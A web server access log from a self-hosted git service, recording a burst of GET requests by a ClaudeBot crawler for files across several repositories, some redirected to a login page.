[Client 216.73.216.188] [Length 250472] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/OpcUaMinimal.csproj" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json?display=rendered" [Client 216.73.216.188] [Length 10956] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 216.73.216.188] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md?display=source" [Client 216.73.216.188] [Length 18621] [Gzip 4.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 216.73.216.188] [Length 10328] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 16673] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 13305] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fgraph" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9849] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 216.73.216.188] [Length 4258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/tsconfig.json" [Client 216.73.216.188] [Length 812] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log?display=source" [Client 216.73.216.188] [Length 10945] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 216.73.216.188] [Length 12952] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 216.73.216.188] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 216.73.216.188] [Length 74447] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 216.73.216.188] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 15937] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 9922] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=source" [Client 216.73.216.188] [Length 11598] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json?display=source" [Client 216.73.216.188] [Length 11018] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 216.73.216.188] [Length 15583] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/README.md" [Client 216.73.216.188] [Length 9765] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" [Client 216.73.216.188] [Length 10764] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/.gitignore" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 11829] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/OpcTest%20program%20by%20claude.md" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/README.md" [Client 216.73.216.188] [Length 804] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages" [Client 216.73.216.188] [Length 9973] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.vscode/launch.json" [Client 216.73.216.188] [Length 9797] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 10839] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 9964] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets" [Client 216.73.216.188] [Length 10577] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14794] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py?display=source" [Client 216.73.216.188] [Length 12310] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.vscode/settings.json" [Client 216.73.216.188] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 216.73.216.188] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" [Client 216.73.216.188] [Length 11416] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" [Client 216.73.216.188] [Length 14579] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json?display=source" [Client 216.73.216.188] [Length 11071] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 12564] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.vscode/launch.json" [Client 216.73.216.188] [Length 885] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" [Client 216.73.216.188] [Length 14193] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css/style.css" [Client 216.73.216.188] [Length 9845] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html" [Client 216.73.216.188] [Length 19210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 216.73.216.188] [Length 11579] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 12105] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 10054] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 14307] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/index.html" [Client 216.73.216.188] [Length 10423] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json?display=source" [Client 216.73.216.188] [Length 44639] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json?display=source" [Client 216.73.216.188] [Length 11259] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/settings.json?display=source" [Client 216.73.216.188] [Length 11672] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css/style.css" [Client 216.73.216.188] [Length 10101] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" [Client 216.73.216.188] [Length 9830] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11250] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/OpcTest%20program%20by%20claude.md" -[15/Feb/2026:09:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr 